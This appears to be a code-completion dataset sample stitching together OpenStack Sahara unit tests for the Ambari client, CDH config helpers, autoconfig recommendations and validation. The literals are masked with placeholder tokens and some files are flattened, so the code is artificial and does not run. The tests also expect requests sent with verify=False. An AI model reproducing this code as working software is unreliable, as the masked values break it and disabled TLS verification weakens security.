image_id ) <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> image_list = cls . client . images . list ( ) <EOL> image_id = TEMPEST_CONF . data_processing . fake_image_id <EOL> if image_id in [ image . id for image in image_list ] : <EOL> cls . client . images . unregister_image ( image_id ) <EOL> super ( JobExecutionTest , cls ) . tearDownClass ( ) </s>
import mock
from oslo_serialization import jsonutils

from sahara.plugins.ambari import client as ambari_client
from sahara.plugins import exceptions as p_exc
from sahara.tests.unit import base


class AmbariClientTestCase(base.SaharaTestCase):
    """Unit tests for the Ambari REST client wrapper."""

    def setUp(self):
        super(AmbariClientTestCase, self).setUp()
        # Fake HTTP session with one mock per HTTP verb.
        self.http_client = mock.Mock()
        self.http_client.get = mock.Mock()
        self.http_client.post = mock.Mock()
        self.http_client.put = mock.Mock()
        self.http_client.delete = mock.Mock()
        self.headers = {"<STR_LIT>": "<STR_LIT>"}
        # Fake the instance.remote().get_http_client() chain so the client
        # under test talks to our mocked session.
        self.remote = mock.Mock()
        self.remote.get_http_client.return_value = self.http_client
        self.instance = mock.Mock()
        self.instance.remote.return_value = self.remote
        self.instance.management_ip = "<STR_LIT>"
        # Canned "request accepted / in progress" Ambari response.
        self.good_pending_resp = mock.MagicMock()
        self.good_pending_resp.status_code = <NUM_LIT:200>
        self.good_pending_resp.text = ('<STR_LIT>'
                                       '<STR_LIT>')

    def test_init_client_default(self):
        # With no arguments the client uses its built-in URL/credentials.
        client = ambari_client.AmbariClient(self.instance)
        self.assertEqual(self.http_client, client._http_client)
        self.assertEqual("<STR_LIT>", client._base_url)
        self.assertEqual("<STR_LIT>", client._auth.username)
        self.assertEqual("<STR_LIT>", client._auth.password)
        self.remote.get_http_client.assert_called_with("<STR_LIT>")

    def test_init_client_manual(self):
        # Explicit port/credentials must override the defaults.
        client = ambari_client.AmbariClient(self.instance, port="<STR_LIT>",
                                            username="<STR_LIT:user>",
                                            password="<STR_LIT>")
        self.assertEqual("<STR_LIT>", client._base_url)
        self.assertEqual("<STR_LIT:user>", client._auth.username)
        self.assertEqual("<STR_LIT>", client._auth.password)
        self.remote.get_http_client.assert_called_with("<STR_LIT>")

    def test_close_http_session(self):
        # Leaving the context manager must close the HTTP session.
        with ambari_client.AmbariClient(self.instance):
            pass
        self.remote.close_http_session.assert_called_with("<STR_LIT>")

    def test_get_method(self):
        # GET must be forwarded with auth/verify/header defaults.
        client = ambari_client.AmbariClient(self.instance)
        client.get("<STR_LIT>")
        self.http_client.get.assert_called_with(
            "<STR_LIT>", verify=False, auth=client._auth,
            headers=self.headers)

    def test_post_method(self):
        # POST must forward the payload alongside the defaults.
        client = ambari_client.AmbariClient(self.instance)
        client.post("<STR_LIT>", data="<STR_LIT:data>")
        self.http_client.post.assert_called_with(
            "<STR_LIT>", data="<STR_LIT:data>", verify=False,
            auth=client._auth,
            headers=self.headers)

    def test_put_method(self):
        # PUT must forward the payload alongside the defaults.
        client = ambari_client.AmbariClient(self.instance)
        client.put("<STR_LIT>", data="<STR_LIT:data>")
        self.http_client.put.assert_called_with(
            "<STR_LIT>", data="<STR_LIT:data>", verify=False,
            auth=client._auth,
            headers=self.headers)

    def test_delete_method(self):
        # DELETE must be forwarded with the defaults.
        client = ambari_client.AmbariClient(self.instance)
        client.delete("<STR_LIT>")
        self.http_client.delete.assert_called_with(
            "<STR_LIT>", verify=False, auth=client._auth,
            headers=self.headers)

    def test_get_registered_hosts(self):
        # A canned hosts payload must be parsed into a three-item list.
        client = ambari_client.AmbariClient(self.instance)
        resp_data = """<STR_LIT>"""
        resp = mock.Mock()
        resp.text = resp_data
        resp.status_code = <NUM_LIT:200>
        self.http_client.get.return_value = resp
        hosts = client.get_registered_hosts()
        self.http_client.get.assert_called_with(
            "<STR_LIT>", verify=False,
            auth=client._auth, headers=self.headers)
        self.assertEqual(<NUM_LIT:3>, len(hosts))
        self.assertEqual("<STR_LIT>",
                         hosts[<NUM_LIT:0>]["<STR_LIT>"]["<STR_LIT>"])
        self.assertEqual("<STR_LIT>",
                         hosts[<NUM_LIT:1>]["<STR_LIT>"]["<STR_LIT>"])
        self.assertEqual("<STR_LIT>",
                         hosts[<NUM_LIT:2>]["<STR_LIT>"]["<STR_LIT>"])

    def test_update_user_password(self):
        # Password change must PUT old and new password in one body.
        client = ambari_client.AmbariClient(self.instance)
        resp = mock.Mock()
        resp.text = "<STR_LIT>"
        resp.status_code = <NUM_LIT:200>
        self.http_client.put.return_value = resp
        client.update_user_password("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
        exp_req = jsonutils.dumps({
            "<STR_LIT>": {
                "<STR_LIT>": "<STR_LIT>",
                "<STR_LIT:password>": "<STR_LIT>"
            }
        })
        self.http_client.put.assert_called_with(
            "<STR_LIT>", data=exp_req,
            verify=False, auth=client._auth, headers=self.headers)

    def test_create_blueprint(self):
        # Blueprint creation must POST the JSON-encoded data.
        client = ambari_client.AmbariClient(self.instance)
        resp = mock.Mock()
        resp.text = "<STR_LIT>"
        resp.status_code = <NUM_LIT:200>
        self.http_client.post.return_value = resp
        client.create_blueprint("<STR_LIT>", {"<STR_LIT>": "<STR_LIT:data>"})
        self.http_client.post.assert_called_with(
            "<STR_LIT>",
            data=jsonutils.dumps({"<STR_LIT>": "<STR_LIT:data>"}), verify=False,
            auth=client._auth, headers=self.headers)

    def test_create_cluster(self):
        # Cluster creation must return the parsed request info with its id.
        client = ambari_client.AmbariClient(self.instance)
        resp = mock.Mock()
        resp.text = """<STR_LIT>"""
        resp.status_code = <NUM_LIT:200>
        self.http_client.post.return_value = resp
        req_info = client.create_cluster("<STR_LIT>", {"<STR_LIT>": "<STR_LIT:data>"})
        self.assertEqual(<NUM_LIT:1>, req_info["<STR_LIT:id>"])
        self.http_client.post.assert_called_with(
            "<STR_LIT>",
            data=jsonutils.dumps({"<STR_LIT>": "<STR_LIT:data>"}), verify=False,
            auth=client._auth, headers=self.headers)

    def test_start_process_on_host(self):
        # Starting a service must PUT the expected state-change body.
        client = ambari_client.AmbariClient(self.instance)
        self.http_client.put.return_value = self.good_pending_resp
        # Waiting is exercised in its own tests; stub it out here.
        client.wait_ambari_request = mock.MagicMock()
        instance = mock.MagicMock()
        instance.fqdn.return_value = "<STR_LIT>"
        instance.cluster.name = "<STR_LIT>"
        client.start_service_on_host(instance, "<STR_LIT>", '<STR_LIT>')
        self.http_client.put.assert_called_with(
            "<STR_LIT>"
            "<STR_LIT>",
            data=jsonutils.dumps(
                {
                    "<STR_LIT>": {"<STR_LIT:state>": "<STR_LIT>"},
                    "<STR_LIT>": {
                        "<STR_LIT>": "<STR_LIT>"
                                     "<STR_LIT>"}
                }),
            verify=False, auth=client._auth, headers=self.headers)

    def test_stop_process_on_host(self):
        # Stopping a process first GETs the current state, then PUTs the
        # stop request.
        client = ambari_client.AmbariClient(self.instance)
        check_mock = mock.MagicMock()
        check_mock.status_code = <NUM_LIT:200>
        check_mock.text = '<STR_LIT>'
        self.http_client.get.return_value = check_mock
        self.http_client.put.return_value = self.good_pending_resp
        client.wait_ambari_request = mock.MagicMock()
        instance = mock.MagicMock()
        instance.fqdn.return_value = "<STR_LIT>"
        client.stop_process_on_host("<STR_LIT>", instance, "<STR_LIT>")
        self.http_client.put.assert_called_with(
            "<STR_LIT>"
            "<STR_LIT>",
            data=jsonutils.dumps(
                {
                    "<STR_LIT>": {"<STR_LIT:state>": "<STR_LIT>"},
                    "<STR_LIT>": {"<STR_LIT>": "<STR_LIT>"}
                }),
            verify=False, auth=client._auth, headers=self.headers)

    @mock.patch("<STR_LIT>")
    def test_wait_ambari_request(self, mock_context):
        # Polling must keep checking until the request reports completion:
        # the first canned status is in-progress, the second is done.
        client = ambari_client.AmbariClient(self.instance)
        check_mock = mock.MagicMock()
        d1 = {"<STR_LIT>": "<STR_LIT>", "<STR_LIT>": "<STR_LIT>",
              "<STR_LIT>": <NUM_LIT>}
        d2 = {"<STR_LIT>": "<STR_LIT>", "<STR_LIT>": "<STR_LIT>",
              "<STR_LIT>": <NUM_LIT:100>}
        check_mock.side_effect = [d1, d2]
        client.check_request_status = check_mock
        client.wait_ambari_request("<STR_LIT>", "<STR_LIT>")
        check_mock.assert_has_calls([mock.call("<STR_LIT>", "<STR_LIT>"),
                                     mock.call("<STR_LIT>", "<STR_LIT>")])

    @mock.patch("<STR_LIT>")
    def test_wait_ambari_request_error(self, mock_context):
        # A failed Ambari request must surface as HadoopProvisionError.
        client = ambari_client.AmbariClient(self.instance)
        check_mock = mock.MagicMock()
        d1 = {"<STR_LIT>": "<STR_LIT>", "<STR_LIT>": "<STR_LIT>",
              "<STR_LIT>": <NUM_LIT>}
        check_mock.return_value = d1
        client.check_request_status = check_mock
        self.assertRaises(p_exc.HadoopProvisionError,
                          client.wait_ambari_request, "<STR_LIT>", "<STR_LIT>")
from oslo_serialization import jsonutils as json

from sahara.plugins.cdh.v5_4_0 import config_helper
from sahara.tests.unit import base
from sahara.tests.unit.plugins.cdh import utils as ctu
from sahara.utils import files as f

# Helper instance under test and the package path of its config definitions.
c_h = config_helper.ConfigHelperV540()
path_to_config = '<STR_LIT>'
# Every JSON definition file the helper is expected to load.
json_files = [
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>'
]


class ConfigHelperTestCase(base.SaharaTestCase):
    """Tests for the CDH 5.4.0 config-helper accessors.

    Each accessor test checks the same two things: the documented default
    is returned when the cluster carries no override, and an explicit
    cluster-level override wins when present.
    """

    def test_get_ng_plugin_configs(self):
        # The helper must expose exactly the config names found in the
        # packaged JSON definition files.
        actual_configs = c_h._get_ng_plugin_configs()
        expected_configs = []
        for json_file in json_files:
            expected_configs += json.loads(
                f.get_file_text(path_to_config + json_file))
        expected_names = set(i['<STR_LIT:name>'] for i in expected_configs)
        actual_names = set(i.to_dict()['<STR_LIT:name>']
                           for i in actual_configs)
        self.assertEqual(expected_names, actual_names)

    def test_get_cdh5_repo_url(self):
        cluster = ctu.get_fake_cluster(cluster_configs={})
        self.assertEqual(c_h.CDH5_REPO_URL.default_value,
                         c_h.get_cdh5_repo_url(cluster))
        cluster = ctu.get_fake_cluster(
            cluster_configs={'<STR_LIT>':
                             {c_h.CDH5_REPO_URL.name: '<STR_LIT>'}})
        self.assertEqual('<STR_LIT>', c_h.get_cdh5_repo_url(cluster))

    def test_get_cdh5_key_url(self):
        cluster = ctu.get_fake_cluster(cluster_configs={})
        self.assertEqual(c_h.CDH5_REPO_KEY_URL.default_value,
                         c_h.get_cdh5_key_url(cluster))
        cluster = ctu.get_fake_cluster(
            cluster_configs={'<STR_LIT>':
                             {c_h.CDH5_REPO_KEY_URL.name: '<STR_LIT>'}})
        self.assertEqual('<STR_LIT>', c_h.get_cdh5_key_url(cluster))

    def test_get_cm5_repo_url(self):
        cluster = ctu.get_fake_cluster(cluster_configs={})
        self.assertEqual(c_h.CM5_REPO_URL.default_value,
                         c_h.get_cm5_repo_url(cluster))
        cluster = ctu.get_fake_cluster(
            cluster_configs={'<STR_LIT>':
                             {c_h.CM5_REPO_URL.name: '<STR_LIT>'}})
        self.assertEqual('<STR_LIT>', c_h.get_cm5_repo_url(cluster))

    def test_get_cm5_key_url(self):
        cluster = ctu.get_fake_cluster(cluster_configs={})
        self.assertEqual(c_h.CM5_REPO_KEY_URL.default_value,
                         c_h.get_cm5_key_url(cluster))
        cluster = ctu.get_fake_cluster(
            cluster_configs={'<STR_LIT>':
                             {c_h.CM5_REPO_KEY_URL.name: '<STR_LIT>'}})
        self.assertEqual('<STR_LIT>', c_h.get_cm5_key_url(cluster))

    def test_is_swift_enabled(self):
        # Swift integration defaults to enabled.
        cluster = ctu.get_fake_cluster(cluster_configs={})
        self.assertTrue(c_h.is_swift_enabled(cluster))
        cluster = ctu.get_fake_cluster(
            cluster_configs={'<STR_LIT>':
                             {c_h.ENABLE_SWIFT.name: False}})
        self.assertFalse(c_h.is_swift_enabled(cluster))

    def test_get_swift_lib_url(self):
        cluster = ctu.get_fake_cluster(cluster_configs={})
        self.assertEqual(c_h.DEFAULT_SWIFT_LIB_URL,
                         c_h.get_swift_lib_url(cluster))
        cluster = ctu.get_fake_cluster(
            cluster_configs={'<STR_LIT>':
                             {c_h.SWIFT_LIB_URL.name: '<STR_LIT>'}})
        self.assertEqual('<STR_LIT>', c_h.get_swift_lib_url(cluster))

    def test_is_hbase_common_lib_enabled(self):
        # The HBase common lib defaults to enabled.
        cluster = ctu.get_fake_cluster(cluster_configs={})
        self.assertTrue(c_h.is_hbase_common_lib_enabled(cluster))
        cluster = ctu.get_fake_cluster(
            cluster_configs={'<STR_LIT>':
                             {c_h.ENABLE_HBASE_COMMON_LIB.name: False}})
        self.assertFalse(c_h.is_hbase_common_lib_enabled(cluster))

    def test_get_extjs_lib_url(self):
        cluster = ctu.get_fake_cluster(cluster_configs={})
        self.assertEqual(c_h.DEFAULT_EXTJS_LIB_URL,
                         c_h.get_extjs_lib_url(cluster))
        cluster = ctu.get_fake_cluster(
            cluster_configs={'<STR_LIT>':
                             {c_h.EXTJS_LIB_URL.name: '<STR_LIT>'}})
        self.assertEqual('<STR_LIT>', c_h.get_extjs_lib_url(cluster))

    def test_get_kms_key_url(self):
        cluster = ctu.get_fake_cluster(cluster_configs={})
        self.assertEqual(c_h.KMS_REPO_KEY_URL.default_value,
                         c_h.get_kms_key_url(cluster))
        cluster = ctu.get_fake_cluster(
            cluster_configs={'<STR_LIT>':
                             {c_h.KMS_REPO_KEY_URL.name: '<STR_LIT>'}})
        self.assertEqual('<STR_LIT>', c_h.get_kms_key_url(cluster))
import mock
import six

from sahara import conductor as cond
from sahara import context
from sahara.plugins import recommendations_utils as ru
from sahara.tests.unit import base as b

conductor = cond.API


class Configs(object):
    """Minimal stand-in for a sahara configs object (only to_dict())."""

    def __init__(self, configs):
        self.configs = configs

    def to_dict(self):
        return self.configs


class FakeObject(object):
    """Generic attribute bag used to fake clusters/node groups/flavors."""

    def __init__(self, **kwargs):
        for attr in six.iterkeys(kwargs):
            setattr(self, attr, kwargs.get(attr))


class TestProvidingRecommendations(b.SaharaWithDbTestCase):
    """Tests for the Hadoop auto-configuration recommendations provider."""

    @mock.patch('<STR_LIT>')
    def test_get_recommended_node_configs_medium_flavor(
            self, fake_flavor):
        # A medium flavor must yield the full recommended config map.
        ng = FakeObject(flavor_id="<STR_LIT>", node_configs=Configs({}))
        cl = FakeObject(cluster_configs=Configs({}))
        fake_flavor.return_value = FakeObject(ram=<NUM_LIT>, vcpus=<NUM_LIT:2>)
        observed = ru.HadoopAutoConfigsProvider(
            {}, [], cl, False)._get_recommended_node_configs(ng)
        self.assertEqual({
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': '<STR_LIT:false>'
        }, observed)

    @mock.patch('<STR_LIT>')
    def test_get_recommended_node_configs_small_flavor(
            self, fake_flavor):
        # A small flavor yields smaller recommendations.
        ng = FakeObject(flavor_id="<STR_LIT>", node_configs=Configs({}))
        cl = FakeObject(cluster_configs=Configs({}))
        fake_flavor.return_value = FakeObject(ram=<NUM_LIT>, vcpus=<NUM_LIT:1>)
        observed = ru.HadoopAutoConfigsProvider(
            {'<STR_LIT>': {}, '<STR_LIT>': {}}, [], cl, False,
        )._get_recommended_node_configs(ng)
        self.assertEqual({
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': '<STR_LIT:false>',
            '<STR_LIT>': <NUM_LIT>,
        }, observed)

    def test_merge_configs(self):
        # Merge must union sections; overlapping sections are merged
        # key-by-key with the extra configs layered on top.
        provider = ru.HadoopAutoConfigsProvider({}, None, None, False)
        initial_configs = {
            '<STR_LIT>': {
                '<STR_LIT>': '<STR_LIT>',
            },
            '<STR_LIT>': {
                '<STR_LIT:name>': '<STR_LIT>'
            }
        }
        extra_configs = {
            '<STR_LIT>': {
                '<STR_LIT>': '<STR_LIT>'
            },
            '<STR_LIT>': {
                '<STR_LIT>': '<STR_LIT>'
            }
        }
        expected = {
            '<STR_LIT>': {
                '<STR_LIT>': '<STR_LIT>',
            },
            '<STR_LIT>': {
                '<STR_LIT>': '<STR_LIT>'
            },
            '<STR_LIT>': {
                '<STR_LIT:name>': '<STR_LIT>',
                '<STR_LIT>': '<STR_LIT>'
            }
        }
        self.assertEqual(
            expected,
            provider._merge_configs(initial_configs, extra_configs))

    @mock.patch('<STR_LIT>')
    @mock.patch('<STR_LIT>'
                '<STR_LIT>')
    @mock.patch('<STR_LIT>'
                '<STR_LIT>')
    def test_apply_recommended_configs(self, cond_cluster, cond_node_group,
                                       fake_flavor):
        # Subclass the provider so the datanode process name is known.
        class TestProvider(ru.HadoopAutoConfigsProvider):
            def get_datanode_name(self):
                return "<STR_LIT>"

        fake_flavor.return_value = FakeObject(ram=<NUM_LIT>, vcpus=<NUM_LIT:1>)
        to_tune = {
            '<STR_LIT>': {
                '<STR_LIT>': ('<STR_LIT>', '<STR_LIT>')
            },
            '<STR_LIT>': {
                '<STR_LIT>': ('<STR_LIT>', '<STR_LIT>')
            }
        }
        fake_plugin_configs = [
            FakeObject(applicable_target='<STR_LIT>', name='<STR_LIT>',
                       default_value=<NUM_LIT:3>)]
        fake_ng = FakeObject(
            use_autoconfig=True,
            count=<NUM_LIT:2>,
            node_processes=['<STR_LIT>'],
            flavor_id='<STR_LIT>',
            node_configs=Configs({
                '<STR_LIT>': {
                    '<STR_LIT:name>': '<STR_LIT>'
                }
            })
        )
        fake_cluster = FakeObject(
            cluster_configs=Configs({
                '<STR_LIT>': {
                    '<STR_LIT>': '<STR_LIT>',
                }
            }),
            node_groups=[fake_ng],
            use_autoconfig=True,
            extra=Configs({})
        )
        v = TestProvider(
            to_tune, fake_plugin_configs, fake_cluster, False)
        v.apply_recommended_configs()
        # Cluster gets the recommended configs plus the "autoconfigured"
        # marker (two conductor calls, in that order).
        self.assertEqual([mock.call(context.ctx(), fake_cluster, {
            '<STR_LIT>': {
                '<STR_LIT>': {
                    '<STR_LIT>': '<STR_LIT>'
                },
                '<STR_LIT>': {
                    '<STR_LIT>': <NUM_LIT:2>
                }
            }
        }), mock.call(
            context.ctx(), fake_cluster,
            {'<STR_LIT>': {'<STR_LIT>': True}})],
            cond_cluster.call_args_list)
        # The node group receives its merged recommended values.
        self.assertEqual([mock.call(context.ctx(), fake_ng, {
            '<STR_LIT>': {
                '<STR_LIT>': {
                    '<STR_LIT:name>': '<STR_LIT>',
                    '<STR_LIT>': <NUM_LIT>
                }
            }
        })], cond_node_group.call_args_list)

    @mock.patch('<STR_LIT>')
    @mock.patch('<STR_LIT>'
                '<STR_LIT>')
    @mock.patch('<STR_LIT>'
                '<STR_LIT>')
    def test_apply_recommended_configs_no_updates(
            self, cond_cluster, cond_node_group, fake_flavor):
        fake_flavor.return_value = FakeObject(ram=<NUM_LIT>, vcpus=<NUM_LIT:1>)
        to_tune = {
            '<STR_LIT>': {
                '<STR_LIT>': ('<STR_LIT>', '<STR_LIT>')
            },
            '<STR_LIT>': {
                '<STR_LIT>': ('<STR_LIT>', '<STR_LIT>')
            }
        }
        fake_plugin_configs = [
            FakeObject(applicable_target='<STR_LIT>', name='<STR_LIT>',
                       default_value=<NUM_LIT:3>)]
        fake_ng = FakeObject(
            use_autoconfig=True,
            count=<NUM_LIT:2>,
            node_processes=['<STR_LIT>'],
            flavor_id='<STR_LIT>',
            node_configs=Configs({
                '<STR_LIT>': {
                    '<STR_LIT>': '<STR_LIT>'
                }
            })
        )
        fake_cluster = FakeObject(
            cluster_configs=Configs({
                '<STR_LIT>': {
                    '<STR_LIT>': <NUM_LIT:1>
                }
            }),
            node_groups=[fake_ng],
            use_autoconfig=True,
            extra=Configs({})
        )
        v = ru.HadoopAutoConfigsProvider(
            to_tune, fake_plugin_configs, fake_cluster, False)
        v.apply_recommended_configs()
        # Everything is already configured manually: node groups untouched,
        # cluster only gets the "autoconfigured" marker.
        self.assertEqual(<NUM_LIT:0>, cond_node_group.call_count)
        self.assertEqual(
            [mock.call(context.ctx(), fake_cluster,
                       {'<STR_LIT>': {'<STR_LIT>': True}})],
            cond_cluster.call_args_list)

    def test_correct_use_autoconfig_value(self):
        # use_autoconfig must propagate from templates to the created
        # cluster and its node groups (default True, explicit False kept).
        ctx = context.ctx()
        ngt1 = conductor.node_group_template_create(ctx, {
            '<STR_LIT:name>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT:1>'
        })
        ngt2 = conductor.node_group_template_create(ctx, {
            '<STR_LIT:name>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT:2>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': False
        })
        self.assertTrue(ngt1.use_autoconfig)
        self.assertFalse(ngt2.use_autoconfig)
        clt = conductor.cluster_template_create(ctx, {
            '<STR_LIT:name>': "<STR_LIT>",
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': [
                {
                    '<STR_LIT:count>': <NUM_LIT:3>,
                    "<STR_LIT>": ngt1.id
                },
                {
                    '<STR_LIT:count>': <NUM_LIT:1>,
                    '<STR_LIT>': ngt2.id
                }
            ],
            '<STR_LIT>': False
        })
        cluster = conductor.cluster_create(ctx, {
            '<STR_LIT:name>': '<STR_LIT>',
            '<STR_LIT>': clt.id
        })
        self.assertFalse(cluster.use_autoconfig)
        for ng in cluster.node_groups:
            if ng.name == '<STR_LIT>':
                self.assertTrue(ng.use_autoconfig)
            else:
                self.assertFalse(ng.use_autoconfig)

    @mock.patch('<STR_LIT>'
                '<STR_LIT>')
    def test_not_autonconfigured(self, cluster_update):
        # With autoconfig disabled the provider must not touch the cluster.
        fake_cluster = FakeObject(extra=Configs({}))
        v = ru.HadoopAutoConfigsProvider({}, [], fake_cluster, True)
        v.apply_recommended_configs()
        self.assertEqual(<NUM_LIT:0>, cluster_update.call_count)
<s> import testtools <EOL> from sahara . service . edp . oozie . workflow_creator import workflow_factory as w_f <EOL> from sahara . utils import edp <EOL> class TestJobPossibleConfigs ( testtools . TestCase ) : <EOL> def test_possible_configs ( self ) : <EOL> res = w_f . get_possible_job_config ( edp . JOB_TYPE_MAPREDUCE ) <EOL> sample_config_property = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:value>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> } <EOL> self . assertIn ( sample_config_property , res [ '<STR_LIT>' ] [ "<STR_LIT>" ] ) <EOL> res = w_f . get_possible_job_config ( edp . JOB_TYPE_HIVE ) <EOL> sample_config_property = { <EOL> "<STR_LIT:description>" : "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:value>" : "<STR_LIT>" <EOL> } <EOL> self . assertIn ( sample_config_property , res [ "<STR_LIT>" ] [ '<STR_LIT>' ] ) <EOL> res = w_f . get_possible_job_config ( "<STR_LIT>" ) <EOL> self . assertIsNone ( res ) </s>
<s> import copy <EOL> import mock <EOL> from sahara . service . api import v10 as api <EOL> from sahara . service . validations import cluster_template_schema as ct_schema <EOL> from sahara . tests . unit . service . validation import utils as u <EOL> SAMPLE_DATA = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> class TestClusterTemplateUpdateValidation ( u . ValidationTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestClusterTemplateUpdateValidation , self ) . setUp ( ) <EOL> self . _create_object_fun = mock . Mock ( ) <EOL> self . scheme = ct_schema . CLUSTER_TEMPLATE_UPDATE_SCHEMA <EOL> api . plugin_base . setup_plugins ( ) <EOL> def test_cluster_template_update_nothing_required ( self ) : <EOL> self . _assert_create_object_validation ( <EOL> data = { } <EOL> ) <EOL> def test_cluster_template_update_schema ( self ) : <EOL> create = copy . copy ( ct_schema . CLUSTER_TEMPLATE_SCHEMA ) <EOL> update = copy . copy ( ct_schema . CLUSTER_TEMPLATE_UPDATE_SCHEMA ) <EOL> self . assertEqual ( [ ] , update [ "<STR_LIT>" ] ) <EOL> del update [ "<STR_LIT>" ] <EOL> del create [ "<STR_LIT>" ] <EOL> self . assertEqual ( create , update ) <EOL> def test_cluster_template_update ( self ) : <EOL> self . _assert_create_object_validation ( <EOL> data = SAMPLE_DATA <EOL> ) <EOL> extra = copy . copy ( SAMPLE_DATA ) <EOL> extra [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . _assert_create_object_validation ( <EOL> data = extra , <EOL> bad_req_i = ( <NUM_LIT:1> , "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ) </s>
<s> import mock <EOL> from sahara . tests . unit import base <EOL> from sahara . utils . openstack import neutron as neutron_client <EOL> class NeutronClientTest ( base . SaharaTestCase ) : <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_get_router ( self , patched , token_auth ) : <EOL> patched . side_effect = _test_get_neutron_client <EOL> neutron = neutron_client . NeutronClient ( <EOL> '<STR_LIT>' , None , None ) <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> neutron . get_router ( ) ) <EOL> def _test_get_neutron_client ( api_version , * args , ** kwargs ) : <EOL> return FakeNeutronClient ( ) <EOL> class FakeNeutronClient ( object ) : <EOL> def list_routers ( self ) : <EOL> return { "<STR_LIT>" : [ { "<STR_LIT:status>" : "<STR_LIT>" , "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT:id>" : "<STR_LIT>" } ] } <EOL> def list_ports ( self , device_id = None ) : <EOL> return { "<STR_LIT>" : [ <EOL> { "<STR_LIT:status>" : "<STR_LIT>" , "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { "<STR_LIT>" : True } , <EOL> "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : [ <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ] , <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:status>" : "<STR_LIT>" , "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { "<STR_LIT>" : True } , <EOL> "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : [ <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ] , <EOL> 
"<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : "<STR_LIT>" } ] } </s>
